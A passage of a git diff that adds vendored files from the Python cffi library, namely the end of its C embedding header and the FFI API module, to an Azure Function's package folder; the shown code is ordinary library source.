*[]); /* forward */ + +static struct _cffi_pypy_init_s { + const char *name; + void *func; /* function pointer */ + const char *code; +} _cffi_pypy_init = { + _CFFI_MODULE_NAME, + _CFFI_PYTHON_STARTUP_FUNC, + _CFFI_PYTHON_STARTUP_CODE, +}; + +extern int pypy_carefully_make_gil(const char *); +extern int pypy_init_embedded_cffi_module(int, struct _cffi_pypy_init_s *); + +static int _cffi_carefully_make_gil(void) +{ + return pypy_carefully_make_gil(_CFFI_MODULE_NAME); +} + +static int _cffi_initialize_python(void) +{ + return pypy_init_embedded_cffi_module(0xB011, &_cffi_pypy_init); +} + +/********** end PyPy-specific section **********/ + + +#endif + + +#ifdef __GNUC__ +__attribute__((noinline)) +#endif +static _cffi_call_python_fnptr _cffi_start_python(void) +{ + /* Delicate logic to initialize Python. This function can be + called multiple times concurrently, e.g. when the process calls + its first ``extern "Python"`` functions in multiple threads at + once. It can also be called recursively, in which case we must + ignore it. We also have to consider what occurs if several + different cffi-based extensions reach this code in parallel + threads---it is a different copy of the code, then, and we + can't have any shared global variable unless it comes from + 'libpythonX.Y.so'. + + Idea: + + * _cffi_carefully_make_gil(): "carefully" call + PyEval_InitThreads() (possibly with Py_InitializeEx() first). + + * then we use a (local) custom lock to make sure that a call to this + cffi-based extension will wait if another call to the *same* + extension is running the initialization in another thread. + It is reentrant, so that a recursive call will not block, but + only one from a different thread. + + * then we grab the GIL and (Python 2) we call Py_InitializeEx(). + At this point, concurrent calls to Py_InitializeEx() are not + possible: we have the GIL. + + * do the rest of the specific initialization, which may + temporarily release the GIL but not the custom lock. + Only release the custom lock when we are done. 
+ */ + static char called = 0; + + if (_cffi_carefully_make_gil() != 0) + return NULL; + + _cffi_acquire_reentrant_mutex(); + + /* Here the GIL exists, but we don't have it. We're only protected + from concurrency by the reentrant mutex. */ + + /* This file only initializes the embedded module once, the first + time this is called, even if there are subinterpreters. */ + if (!called) { + called = 1; /* invoke _cffi_initialize_python() only once, + but don't set '_cffi_call_python' right now, + otherwise concurrent threads won't call + this function at all (we need them to wait) */ + if (_cffi_initialize_python() == 0) { + /* now initialization is finished. Switch to the fast-path. */ + + /* We would like nobody to see the new value of + '_cffi_call_python' without also seeing the rest of the + data initialized. However, this is not possible. But + the new value of '_cffi_call_python' is the function + 'cffi_call_python()' from _cffi_backend. So: */ + cffi_write_barrier(); + /* ^^^ we put a write barrier here, and a corresponding + read barrier at the start of cffi_call_python(). This + ensures that after that read barrier, we see everything + done here before the write barrier. + */ + + assert(_cffi_call_python_org != NULL); + _cffi_call_python = (_cffi_call_python_fnptr)_cffi_call_python_org; + } + else { + /* initialization failed. Reset this to NULL, even if it was + already set to some other value. Future calls to + _cffi_start_python() are still forced to occur, and will + always return NULL from now on. */ + _cffi_call_python_org = NULL; + } + } + + _cffi_release_reentrant_mutex(); + + return (_cffi_call_python_fnptr)_cffi_call_python_org; +} + +static +void _cffi_start_and_call_python(struct _cffi_externpy_s *externpy, char *args) +{ + _cffi_call_python_fnptr fnptr; + int current_err = errno; +#ifdef _MSC_VER + int current_lasterr = GetLastError(); +#endif + fnptr = _cffi_start_python(); + if (fnptr == NULL) { + fprintf(stderr, "function %s() called, but initialization code " + "failed. Returning 0.\n", externpy->name); + memset(args, 0, externpy->size_of_result); + } +#ifdef _MSC_VER + SetLastError(current_lasterr); +#endif + errno = current_err; + + if (fnptr != NULL) + fnptr(externpy, args); +} + + +/* The cffi_start_python() function makes sure Python is initialized + and our cffi module is set up. It can be called manually from the + user C code. The same effect is obtained automatically from any + dll-exported ``extern "Python"`` function. This function returns + -1 if initialization failed, 0 if all is OK. */ +_CFFI_UNUSED_FN +static int cffi_start_python(void) +{ + if (_cffi_call_python == &_cffi_start_and_call_python) { + if (_cffi_start_python() == NULL) + return -1; + } + cffi_read_barrier(); + return 0; +} + +#undef cffi_compare_and_swap +#undef cffi_write_barrier +#undef cffi_read_barrier + +#ifdef __cplusplus +} +#endif diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cffi/api.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cffi/api.py new file mode 100644 index 0000000..10090fe --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cffi/api.py @@ -0,0 +1,965 @@ +import sys, types +from .lock import allocate_lock +from .error import CDefError +from . 
import model + +try: + callable +except NameError: + # Python 3.1 + from collections import Callable + callable = lambda x: isinstance(x, Callable) + +try: + basestring +except NameError: + # Python 3.x + basestring = str + +_unspecified = object() + + + +class FFI(object): + r''' + The main top-level class that you instantiate once, or once per module. + + Example usage: + + ffi = FFI() + ffi.cdef(""" + int printf(const char *, ...); + """) + + C = ffi.dlopen(None) # standard library + -or- + C = ffi.verify() # use a C compiler: verify the decl above is right + + C.printf("hello, %s!\n", ffi.new("char[]", "world")) + ''' + + def __init__(self, backend=None): + """Create an FFI instance. The 'backend' argument is used to + select a non-default backend, mostly for tests. + """ + if backend is None: + # You need PyPy (>= 2.0 beta), or a CPython (>= 2.6) with + # _cffi_backend.so compiled. + import _cffi_backend as backend + from . import __version__ + if backend.__version__ != __version__: + # bad version! Try to be as explicit as possible. + if hasattr(backend, '__file__'): + # CPython + raise Exception("Version mismatch: this is the 'cffi' package version %s, located in %r. When we import the top-level '_cffi_backend' extension module, we get version %s, located in %r. The two versions should be equal; check your installation." % ( + __version__, __file__, + backend.__version__, backend.__file__)) + else: + # PyPy + raise Exception("Version mismatch: this is the 'cffi' package version %s, located in %r. This interpreter comes with a built-in '_cffi_backend' module, which is version %s. The two versions should be equal; check your installation." % ( + __version__, __file__, backend.__version__)) + # (If you insist you can also try to pass the option + # 'backend=backend_ctypes.CTypesBackend()', but don't + # rely on it! It's probably not going to work well.) + + from . import cparser + self._backend = backend + self._lock = allocate_lock() + self._parser = cparser.Parser() + self._cached_btypes = {} + self._parsed_types = types.ModuleType('parsed_types').__dict__ + self._new_types = types.ModuleType('new_types').__dict__ + self._function_caches = [] + self._libraries = [] + self._cdefsources = [] + self._included_ffis = [] + self._windows_unicode = None + self._init_once_cache = {} + self._cdef_version = None + self._embedding = None + self._typecache = model.get_typecache(backend) + if hasattr(backend, 'set_ffi'): + backend.set_ffi(self) + for name in list(backend.__dict__): + if name.startswith('RTLD_'): + setattr(self, name, getattr(backend, name)) + # + with self._lock: + self.BVoidP = self._get_cached_btype(model.voidp_type) + self.BCharA = self._get_cached_btype(model.char_array_type) + if isinstance(backend, types.ModuleType): + # _cffi_backend: attach these constants to the class + if not hasattr(FFI, 'NULL'): + FFI.NULL = self.cast(self.BVoidP, 0) + FFI.CData, FFI.CType = backend._get_types() + else: + # ctypes backend: attach these constants to the instance + self.NULL = self.cast(self.BVoidP, 0) + self.CData, self.CType = backend._get_types() + self.buffer = backend.buffer + + def cdef(self, csource, override=False, packed=False, pack=None): + """Parse the given C source. This registers all declared functions, + types, and global variables. The functions and global variables can + then be accessed via either 'ffi.dlopen()' or 'ffi.verify()'. + The types can be used in 'ffi.new()' and other functions. 
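The cdef()/dlopen() pair documented here is cffi's ABI-mode workflow. A minimal usage sketch (not part of the vendored file; dlopen(None) loads the standard C library on most Unix systems, while Windows needs an explicit library name):

from cffi import FFI

ffi = FFI()
ffi.cdef("int printf(const char *format, ...);")   # declare, as from a C header
C = ffi.dlopen(None)                                # standard C library
C.printf(b"hi there, %s.\n", ffi.new("char[]", b"world"))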
+ If 'packed' is specified as True, all structs declared inside this
+ cdef are packed, i.e. laid out without any field alignment at all.
+ Alternatively, 'pack' can be a small integer, and requests for
+ alignment greater than that are ignored (pack=1 is equivalent to
+ packed=True).
+ """
+ self._cdef(csource, override=override, packed=packed, pack=pack)
+
+ def embedding_api(self, csource, packed=False, pack=None):
+ self._cdef(csource, packed=packed, pack=pack, dllexport=True)
+ if self._embedding is None:
+ self._embedding = ''
+
+ def _cdef(self, csource, override=False, **options):
+ if not isinstance(csource, str): # unicode, on Python 2
+ if not isinstance(csource, basestring):
+ raise TypeError("cdef() argument must be a string")
+ csource = csource.encode('ascii')
+ with self._lock:
+ self._cdef_version = object()
+ self._parser.parse(csource, override=override, **options)
+ self._cdefsources.append(csource)
+ if override:
+ for cache in self._function_caches:
+ cache.clear()
+ finishlist = self._parser._recomplete
+ if finishlist:
+ self._parser._recomplete = []
+ for tp in finishlist:
+ tp.finish_backend_type(self, finishlist)
+
+ def dlopen(self, name, flags=0):
+ """Load and return a dynamic library identified by 'name'.
+ The standard C library can be loaded by passing None.
+ Note that functions and types declared by 'ffi.cdef()' are not
+ linked to a particular library, just like C headers; in the
+ library we only look for the actual (untyped) symbols.
+ """
+ if not (isinstance(name, basestring) or
+ name is None or
+ isinstance(name, self.CData)):
+ raise TypeError("dlopen(name): name must be a file name, None, "
+ "or an already-opened 'void *' handle")
+ with self._lock:
+ lib, function_cache = _make_ffi_library(self, name, flags)
+ self._function_caches.append(function_cache)
+ self._libraries.append(lib)
+ return lib
+
+ def dlclose(self, lib):
+ """Close a library obtained with ffi.dlopen(). After this call,
+ access to functions or variables from the library will fail
+ (possibly with a segmentation fault).
+ """
+ type(lib).__cffi_close__(lib)
+
+ def _typeof_locked(self, cdecl):
+ # call me with the lock!
+ key = cdecl
+ if key in self._parsed_types:
+ return self._parsed_types[key]
+ #
+ if not isinstance(cdecl, str): # unicode, on Python 2
+ cdecl = cdecl.encode('ascii')
+ #
+ type = self._parser.parse_type(cdecl)
+ really_a_function_type = type.is_raw_function
+ if really_a_function_type:
+ type = type.as_function_pointer()
+ btype = self._get_cached_btype(type)
+ result = btype, really_a_function_type
+ self._parsed_types[key] = result
+ return result
+
+ def _typeof(self, cdecl, consider_function_as_funcptr=False):
+ # string -> ctype object
+ try:
+ result = self._parsed_types[cdecl]
+ except KeyError:
+ with self._lock:
+ result = self._typeof_locked(cdecl)
+ #
+ btype, really_a_function_type = result
+ if really_a_function_type and not consider_function_as_funcptr:
+ raise CDefError("the type %r is a function type, not a "
+ "pointer-to-function type" % (cdecl,))
+ return btype
+
+ def typeof(self, cdecl):
+ """Parse the C type given as a string and return the
+ corresponding <ctype> object.
+ It can also be used on 'cdata' instance to get its C type.
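A short illustration of the distinction _typeof() enforces above: a raw function type is rejected unless it is requested as a pointer-to-function (a sketch, not part of the vendored file):

from cffi import FFI
from cffi.error import CDefError

ffi = FFI()
print(ffi.typeof("int(*)(int, int)"))   # pointer-to-function ctype: accepted
try:
    ffi.typeof("int(int, int)")         # plain function type
except CDefError as e:
    print(e)   # "... is a function type, not a pointer-to-function type"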
+ """ + if isinstance(cdecl, basestring): + return self._typeof(cdecl) + if isinstance(cdecl, self.CData): + return self._backend.typeof(cdecl) + if isinstance(cdecl, types.BuiltinFunctionType): + res = _builtin_function_type(cdecl) + if res is not None: + return res + if (isinstance(cdecl, types.FunctionType) + and hasattr(cdecl, '_cffi_base_type')): + with self._lock: + return self._get_cached_btype(cdecl._cffi_base_type) + raise TypeError(type(cdecl)) + + def sizeof(self, cdecl): + """Return the size in bytes of the argument. It can be a + string naming a C type, or a 'cdata' instance. + """ + if isinstance(cdecl, basestring): + BType = self._typeof(cdecl) + return self._backend.sizeof(BType) + else: + return self._backend.sizeof(cdecl) + + def alignof(self, cdecl): + """Return the natural alignment size in bytes of the C type + given as a string. + """ + if isinstance(cdecl, basestring): + cdecl = self._typeof(cdecl) + return self._backend.alignof(cdecl) + + def offsetof(self, cdecl, *fields_or_indexes): + """Return the offset of the named field inside the given + structure or array, which must be given as a C type name. + You can give several field names in case of nested structures. + You can also give numeric values which correspond to array + items, in case of an array type. + """ + if isinstance(cdecl, basestring): + cdecl = self._typeof(cdecl) + return self._typeoffsetof(cdecl, *fields_or_indexes)[1] + + def new(self, cdecl, init=None): + """Allocate an instance according to the specified C type and + return a pointer to it. The specified C type must be either a + pointer or an array: ``new('X *')`` allocates an X and returns + a pointer to it, whereas ``new('X[n]')`` allocates an array of + n X'es and returns an array referencing it (which works + mostly like a pointer, like in C). You can also use + ``new('X[]', n)`` to allocate an array of a non-constant + length n. + + The memory is initialized following the rules of declaring a + global variable in C: by default it is zero-initialized, but + an explicit initializer can be given which can be used to + fill all or part of the memory. + + When the returned object goes out of scope, the memory + is freed. In other words the returned object has + ownership of the value of type 'cdecl' that it points to. This + means that the raw data can be used as long as this object is + kept alive, but must not be used for a longer time. Be careful + about that when copying the pointer to the memory somewhere + else, e.g. into another structure. + """ + if isinstance(cdecl, basestring): + cdecl = self._typeof(cdecl) + return self._backend.newp(cdecl, init) + + def new_allocator(self, alloc=None, free=None, + should_clear_after_alloc=True): + """Return a new allocator, i.e. a function that behaves like ffi.new() + but uses the provided low-level 'alloc' and 'free' functions. + + 'alloc' is called with the size as argument. If it returns NULL, a + MemoryError is raised. 'free' is called with the result of 'alloc' + as argument. Both can be either Python function or directly C + functions. If 'free' is None, then no free function is called. + If both 'alloc' and 'free' are None, the default is used. + + If 'should_clear_after_alloc' is set to False, then the memory + returned by 'alloc' is assumed to be already cleared (or you are + fine with garbage); otherwise CFFI will clear it. 
+ """ + compiled_ffi = self._backend.FFI() + allocator = compiled_ffi.new_allocator(alloc, free, + should_clear_after_alloc) + def allocate(cdecl, init=None): + if isinstance(cdecl, basestring): + cdecl = self._typeof(cdecl) + return allocator(cdecl, init) + return allocate + + def cast(self, cdecl, source): + """Similar to a C cast: returns an instance of the named C + type initialized with the given 'source'. The source is + casted between integers or pointers of any type. + """ + if isinstance(cdecl, basestring): + cdecl = self._typeof(cdecl) + return self._backend.cast(cdecl, source) + + def string(self, cdata, maxlen=-1): + """Return a Python string (or unicode string) from the 'cdata'. + If 'cdata' is a pointer or array of characters or bytes, returns + the null-terminated string. The returned string extends until + the first null character, or at most 'maxlen' characters. If + 'cdata' is an array then 'maxlen' defaults to its length. + + If 'cdata' is a pointer or array of wchar_t, returns a unicode + string following the same rules. + + If 'cdata' is a single character or byte or a wchar_t, returns + it as a string or unicode string. + + If 'cdata' is an enum, returns the value of the enumerator as a + string, or 'NUMBER' if the value is out of range. + """ + return self._backend.string(cdata, maxlen) + + def unpack(self, cdata, length): + """Unpack an array of C data of the given length, + returning a Python string/unicode/list. + + If 'cdata' is a pointer to 'char', returns a byte string. + It does not stop at the first null. This is equivalent to: + ffi.buffer(cdata, length)[:] + + If 'cdata' is a pointer to 'wchar_t', returns a unicode string. + 'length' is measured in wchar_t's; it is not the size in bytes. + + If 'cdata' is a pointer to anything else, returns a list of + 'length' items. This is a faster equivalent to: + [cdata[i] for i in range(length)] + """ + return self._backend.unpack(cdata, length) + + #def buffer(self, cdata, size=-1): + # """Return a read-write buffer object that references the raw C data + # pointed to by the given 'cdata'. The 'cdata' must be a pointer or + # an array. Can be passed to functions expecting a buffer, or directly + # manipulated with: + # + # buf[:] get a copy of it in a regular string, or + # buf[idx] as a single character + # buf[:] = ... + # buf[idx] = ... change the content + # """ + # note that 'buffer' is a type, set on this instance by __init__ + + def from_buffer(self, cdecl, python_buffer=_unspecified, + require_writable=False): + """Return a cdata of the given type pointing to the data of the + given Python object, which must support the buffer interface. + Note that this is not meant to be used on the built-in types + str or unicode (you can build 'char[]' arrays explicitly) + but only on objects containing large quantities of raw data + in some other format, like 'array.array' or numpy arrays. + + The first argument is optional and default to 'char[]'. + """ + if python_buffer is _unspecified: + cdecl, python_buffer = self.BCharA, cdecl + elif isinstance(cdecl, basestring): + cdecl = self._typeof(cdecl) + return self._backend.from_buffer(cdecl, python_buffer, + require_writable) + + def memmove(self, dest, src, n): + """ffi.memmove(dest, src, n) copies n bytes of memory from src to dest. + + Like the C function memmove(), the memory areas may overlap; + apart from that it behaves like the C function memcpy(). + + 'src' can be any cdata ptr or array, or any Python buffer object. 
+ 'dest' can be any cdata ptr or array, or a writable Python buffer
+ object. The size to copy, 'n', is always measured in bytes.
+
+ Unlike other methods, this one supports all Python buffers, including
+ byte strings and bytearrays---but it still does not support
+ non-contiguous buffers.
+ """
+ return self._backend.memmove(dest, src, n)
+
+ def callback(self, cdecl, python_callable=None, error=None, onerror=None):
+ """Return a callback object or a decorator making such a
+ callback object. 'cdecl' must name a C function pointer type.
+ The callback invokes the specified 'python_callable' (which may
+ be provided either directly or via a decorator). Important: the
+ callback object must be manually kept alive for as long as the
+ callback may be invoked from the C level.
+ """
+ def callback_decorator_wrap(python_callable):
+ if not callable(python_callable):
+ raise TypeError("the 'python_callable' argument "
+ "is not callable")
+ return self._backend.callback(cdecl, python_callable,
+ error, onerror)
+ if isinstance(cdecl, basestring):
+ cdecl = self._typeof(cdecl, consider_function_as_funcptr=True)
+ if python_callable is None:
+ return callback_decorator_wrap # decorator mode
+ else:
+ return callback_decorator_wrap(python_callable) # direct mode
+
+ def getctype(self, cdecl, replace_with=''):
+ """Return a string giving the C type 'cdecl', which may be itself
+ a string or a <ctype> object. If 'replace_with' is given, it gives
+ extra text to append (or insert for more complicated C types), like
+ a variable name, or '*' to get actually the C type 'pointer-to-cdecl'.
+ """
+ if isinstance(cdecl, basestring):
+ cdecl = self._typeof(cdecl)
+ replace_with = replace_with.strip()
+ if (replace_with.startswith('*')
+ and '&[' in self._backend.getcname(cdecl, '&')):
+ replace_with = '(%s)' % replace_with
+ elif replace_with and not replace_with[0] in '[(':
+ replace_with = ' ' + replace_with
+ return self._backend.getcname(cdecl, replace_with)
+
+ def gc(self, cdata, destructor, size=0):
+ """Return a new cdata object that points to the same
+ data. Later, when this new cdata object is garbage-collected,
+ 'destructor(old_cdata_object)' will be called.
+
+ The optional 'size' gives an estimate of the size, used to
+ trigger the garbage collection more eagerly. So far only used
+ on PyPy. It tells the GC that the returned object keeps alive
+ roughly 'size' bytes of external memory.
+ """
+ return self._backend.gcp(cdata, destructor, size)
+
+ def _get_cached_btype(self, type):
+ assert self._lock.acquire(False) is False
+ # call me with the lock!
+ try:
+ BType = self._cached_btypes[type]
+ except KeyError:
+ finishlist = []
+ BType = type.get_cached_btype(self, finishlist)
+ for type in finishlist:
+ type.finish_backend_type(self, finishlist)
+ return BType
+
+ def verify(self, source='', tmpdir=None, **kwargs):
+ """Verify that the current ffi signatures compile on this
+ machine, and return a dynamic library object. The dynamic
+ library can be used to call functions and access global
+ variables declared in this 'ffi'. The library is compiled
+ by the C compiler: it gives you C-level API compatibility
+ (including calling macros). This is unlike 'ffi.dlopen()',
+ which requires binary compatibility in the signatures.
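The keep-alive rule in callback()'s docstring above is the classic pitfall; a sketch of the safe pattern:

from cffi import FFI

ffi = FFI()

@ffi.callback("int(int, int)")
def adder(x, y):
    return x + y

callbacks_keepalive = [adder]   # hold a reference as long as C may call it;
                                # letting it be collected while registered crashes
print(adder(2, 3))              # the callback object is also callable: 5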
+ """ + from .verifier import Verifier, _caller_dir_pycache + # + # If set_unicode(True) was called, insert the UNICODE and + # _UNICODE macro declarations + if self._windows_unicode: + self._apply_windows_unicode(kwargs) + # + # Set the tmpdir here, and not in Verifier.__init__: it picks + # up the caller's directory, which we want to be the caller of + # ffi.verify(), as opposed to the caller of Veritier(). + tmpdir = tmpdir or _caller_dir_pycache() + # + # Make a Verifier() and use it to load the library. + self.verifier = Verifier(self, source, tmpdir, **kwargs) + lib = self.verifier.load_library() + # + # Save the loaded library for keep-alive purposes, even + # if the caller doesn't keep it alive itself (it should). + self._libraries.append(lib) + return lib + + def _get_errno(self): + return self._backend.get_errno() + def _set_errno(self, errno): + self._backend.set_errno(errno) + errno = property(_get_errno, _set_errno, None, + "the value of 'errno' from/to the C calls") + + def getwinerror(self, code=-1): + return self._backend.getwinerror(code) + + def _pointer_to(self, ctype): + with self._lock: + return model.pointer_cache(self, ctype) + + def addressof(self, cdata, *fields_or_indexes): + """Return the address of a . + If 'fields_or_indexes' are given, returns the address of that + field or array item in the structure or array, recursively in + case of nested structures. + """ + try: + ctype = self._backend.typeof(cdata) + except TypeError: + if '__addressof__' in type(cdata).__dict__: + return type(cdata).__addressof__(cdata, *fields_or_indexes) + raise + if fields_or_indexes: + ctype, offset = self._typeoffsetof(ctype, *fields_or_indexes) + else: + if ctype.kind == "pointer": + raise TypeError("addressof(pointer)") + offset = 0 + ctypeptr = self._pointer_to(ctype) + return self._backend.rawaddressof(ctypeptr, cdata, offset) + + def _typeoffsetof(self, ctype, field_or_index, *fields_or_indexes): + ctype, offset = self._backend.typeoffsetof(ctype, field_or_index) + for field1 in fields_or_indexes: + ctype, offset1 = self._backend.typeoffsetof(ctype, field1, 1) + offset += offset1 + return ctype, offset + + def include(self, ffi_to_include): + """Includes the typedefs, structs, unions and enums defined + in another FFI instance. Usage is similar to a #include in C, + where a part of the program might include types defined in + another part for its own usage. Note that the include() + method has no effect on functions, constants and global + variables, which must anyway be accessed directly from the + lib object returned by the original FFI instance. + """ + if not isinstance(ffi_to_include, FFI): + raise TypeError("ffi.include() expects an argument that is also of" + " type cffi.FFI, not %r" % ( + type(ffi_to_include).__name__,)) + if ffi_to_include is self: + raise ValueError("self.include(self)") + with ffi_to_include._lock: + with self._lock: + self._parser.include(ffi_to_include._parser) + self._cdefsources.append('[') + self._cdefsources.extend(ffi_to_include._cdefsources) + self._cdefsources.append(']') + self._included_ffis.append(ffi_to_include) + + def new_handle(self, x): + return self._backend.newp_handle(self.BVoidP, x) + + def from_handle(self, x): + return self._backend.from_handle(x) + + def release(self, x): + self._backend.release(x) + + def set_unicode(self, enabled_flag): + """Windows: if 'enabled_flag' is True, enable the UNICODE and + _UNICODE defines in C, and declare the types like TCHAR and LPTCSTR + to be (pointers to) wchar_t. 
If 'enabled_flag' is False, + declare these types to be (pointers to) plain 8-bit characters. + This is mostly for backward compatibility; you usually want True. + """ + if self._windows_unicode is not None: + raise ValueError("set_unicode() can only be called once") + enabled_flag = bool(enabled_flag) + if enabled_flag: + self.cdef("typedef wchar_t TBYTE;" + "typedef wchar_t TCHAR;" + "typedef const wchar_t *LPCTSTR;" + "typedef const wchar_t *PCTSTR;" + "typedef wchar_t *LPTSTR;" + "typedef wchar_t *PTSTR;" + "typedef TBYTE *PTBYTE;" + "typedef TCHAR *PTCHAR;") + else: + self.cdef("typedef char TBYTE;" + "typedef char TCHAR;" + "typedef const char *LPCTSTR;" + "typedef const char *PCTSTR;" + "typedef char *LPTSTR;" + "typedef char *PTSTR;" + "typedef TBYTE *PTBYTE;" + "typedef TCHAR *PTCHAR;") + self._windows_unicode = enabled_flag + + def _apply_windows_unicode(self, kwds): + defmacros = kwds.get('define_macros', ()) + if not isinstance(defmacros, (list, tuple)): + raise TypeError("'define_macros' must be a list or tuple") + defmacros = list(defmacros) + [('UNICODE', '1'), + ('_UNICODE', '1')] + kwds['define_macros'] = defmacros + + def _apply_embedding_fix(self, kwds): + # must include an argument like "-lpython2.7" for the compiler + def ensure(key, value): + lst = kwds.setdefault(key, []) + if value not in lst: + lst.append(value) + # + if '__pypy__' in sys.builtin_module_names: + import os + if sys.platform == "win32": + # we need 'libpypy-c.lib'. Current distributions of + # pypy (>= 4.1) contain it as 'libs/python27.lib'. + pythonlib = "python{0[0]}{0[1]}".format(sys.version_info) + if hasattr(sys, 'prefix'): + ensure('library_dirs', os.path.join(sys.prefix, 'libs')) + else: + # we need 'libpypy-c.{so,dylib}', which should be by + # default located in 'sys.prefix/bin' for installed + # systems. + if sys.version_info < (3,): + pythonlib = "pypy-c" + else: + pythonlib = "pypy3-c" + if hasattr(sys, 'prefix'): + ensure('library_dirs', os.path.join(sys.prefix, 'bin')) + # On uninstalled pypy's, the libpypy-c is typically found in + # .../pypy/goal/. + if hasattr(sys, 'prefix'): + ensure('library_dirs', os.path.join(sys.prefix, 'pypy', 'goal')) + else: + if sys.platform == "win32": + template = "python%d%d" + if hasattr(sys, 'gettotalrefcount'): + template += '_d' + else: + try: + import sysconfig + except ImportError: # 2.6 + from distutils import sysconfig + template = "python%d.%d" + if sysconfig.get_config_var('DEBUG_EXT'): + template += sysconfig.get_config_var('DEBUG_EXT') + pythonlib = (template % + (sys.hexversion >> 24, (sys.hexversion >> 16) & 0xff)) + if hasattr(sys, 'abiflags'): + pythonlib += sys.abiflags + ensure('libraries', pythonlib) + if sys.platform == "win32": + ensure('extra_link_args', '/MANIFEST') + + def set_source(self, module_name, source, source_extension='.c', **kwds): + import os + if hasattr(self, '_assigned_source'): + raise ValueError("set_source() cannot be called several times " + "per ffi object") + if not isinstance(module_name, basestring): + raise TypeError("'module_name' must be a string") + if os.sep in module_name or (os.altsep and os.altsep in module_name): + raise ValueError("'module_name' must not contain '/': use a dotted " + "name to make a 'package.module' location") + self._assigned_source = (str(module_name), source, + source_extension, kwds) + + def set_source_pkgconfig(self, module_name, pkgconfig_libs, source, + source_extension='.c', **kwds): + from . 
import pkgconfig
+ if not isinstance(pkgconfig_libs, list):
+ raise TypeError("the pkgconfig_libs argument must be a list "
+ "of package names")
+ kwds2 = pkgconfig.flags_from_pkgconfig(pkgconfig_libs)
+ pkgconfig.merge_flags(kwds, kwds2)
+ self.set_source(module_name, source, source_extension, **kwds)
+
+ def distutils_extension(self, tmpdir='build', verbose=True):
+ from distutils.dir_util import mkpath
+ from .recompiler import recompile
+ #
+ if not hasattr(self, '_assigned_source'):
+ if hasattr(self, 'verifier'): # fallback, 'tmpdir' ignored
+ return self.verifier.get_extension()
+ raise ValueError("set_source() must be called before"
+ " distutils_extension()")
+ module_name, source, source_extension, kwds = self._assigned_source
+ if source is None:
+ raise TypeError("distutils_extension() is only for C extension "
+ "modules, not for dlopen()-style pure Python "
+ "modules")
+ mkpath(tmpdir)
+ ext, updated = recompile(self, module_name,
+ source, tmpdir=tmpdir, extradir=tmpdir,
+ source_extension=source_extension,
+ call_c_compiler=False, **kwds)
+ if verbose:
+ if updated:
+ sys.stderr.write("regenerated: %r\n" % (ext.sources[0],))
+ else:
+ sys.stderr.write("not modified: %r\n" % (ext.sources[0],))
+ return ext
+
+ def emit_c_code(self, filename):
+ from .recompiler import recompile
+ #
+ if not hasattr(self, '_assigned_source'):
+ raise ValueError("set_source() must be called before emit_c_code()")
+ module_name, source, source_extension, kwds = self._assigned_source
+ if source is None:
+ raise TypeError("emit_c_code() is only for C extension modules, "
+ "not for dlopen()-style pure Python modules")
+ recompile(self, module_name, source,
+ c_file=filename, call_c_compiler=False, **kwds)
+
+ def emit_python_code(self, filename):
+ from .recompiler import recompile
+ #
+ if not hasattr(self, '_assigned_source'):
+ raise ValueError("set_source() must be called before emit_python_code()")
+ module_name, source, source_extension, kwds = self._assigned_source
+ if source is not None:
+ raise TypeError("emit_python_code() is only for dlopen()-style "
+ "pure Python modules, not for C extension modules")
+ recompile(self, module_name, source,
+ c_file=filename, call_c_compiler=False, **kwds)
+
+ def compile(self, tmpdir='.', verbose=0, target=None, debug=None):
+ """The 'target' argument gives the final file name of the
+ compiled DLL. Use '*' to force distutils' choice, suitable for
+ regular CPython C API modules. Use a file name ending in '.*'
+ to ask for the system's default extension for dynamic libraries
+ (.so/.dll/.dylib).
+
+ The default is '*' when building a non-embedded C API extension,
+ and (module_name + '.*') when building an embedded library.
+ """
+ from .recompiler import recompile
+ #
+ if not hasattr(self, '_assigned_source'):
+ raise ValueError("set_source() must be called before compile()")
+ module_name, source, source_extension, kwds = self._assigned_source
+ return recompile(self, module_name, source, tmpdir=tmpdir,
+ target=target, source_extension=source_extension,
+ compiler_verbose=verbose, debug=debug, **kwds)
+
+ def init_once(self, func, tag):
+ # Read _init_once_cache[tag], which is either (False, lock) if
+ # we're calling the function now in some thread, or (True, result).
+ # Don't call setdefault() in most cases, to avoid allocating and
+ # immediately freeing a lock; but still use setdefault() to avoid
+ # races.
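init_once() implements the double-checked locking described in the comment above; from the caller's side it behaves like this sketch:

from cffi import FFI

ffi = FFI()

def connect():
    print("runs exactly once")
    return object()

h1 = ffi.init_once(connect, "db")
h2 = ffi.init_once(connect, "db")   # returns the cached result, no second call
assert h1 is h2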
+ try: + x = self._init_once_cache[tag] + except KeyError: + x = self._init_once_cache.setdefault(tag, (False, allocate_lock())) + # Common case: we got (True, result), so we return the result. + if x[0]: + return x[1] + # Else, it's a lock. Acquire it to serialize the following tests. + with x[1]: + # Read again from _init_once_cache the current status. + x = self._init_once_cache[tag] + if x[0]: + return x[1] + # Call the function and store the result back. + result = func() + self._init_once_cache[tag] = (True, result) + return result + + def embedding_init_code(self, pysource): + if self._embedding: + raise ValueError("embedding_init_code() can only be called once") + # fix 'pysource' before it gets dumped into the C file: + # - remove empty lines at the beginning, so it starts at "line 1" + # - dedent, if all non-empty lines are indented + # - check for SyntaxErrors + import re + match = re.match(r'\s*\n', pysource) + if match: + pysource = pysource[match.end():] + lines = pysource.splitlines() or [''] + prefix = re.match(r'\s*', lines[0]).group() + for i in range(1, len(lines)): + line = lines[i] + if line.rstrip(): + while not line.startswith(prefix): + prefix = prefix[:-1] + i = len(prefix) + lines = [line[i:]+'\n' for line in lines] + pysource = ''.join(lines) + # + compile(pysource, "cffi_init", "exec") + # + self._embedding = pysource + + def def_extern(self, *args, **kwds): + raise ValueError("ffi.def_extern() is only available on API-mode FFI " + "objects") + + def list_types(self): + """Returns the user type names known to this FFI instance. + This returns a tuple containing three lists of names: + (typedef_names, names_of_structs, names_of_unions) + """ + typedefs = [] + structs = [] + unions = [] + for key in self._parser._declarations: + if key.startswith('typedef '): + typedefs.append(key[8:]) + elif key.startswith('struct '): + structs.append(key[7:]) + elif key.startswith('union '): + unions.append(key[6:]) + typedefs.sort() + structs.sort() + unions.sort() + return (typedefs, structs, unions) + + +def _load_backend_lib(backend, name, flags): + import os + if not isinstance(name, basestring): + if sys.platform != "win32" or name is not None: + return backend.load_library(name, flags) + name = "c" # Windows: load_library(None) fails, but this works + # on Python 2 (backward compatibility hack only) + first_error = None + if '.' in name or '/' in name or os.sep in name: + try: + return backend.load_library(name, flags) + except OSError as e: + first_error = e + import ctypes.util + path = ctypes.util.find_library(name) + if path is None: + if name == "c" and sys.platform == "win32" and 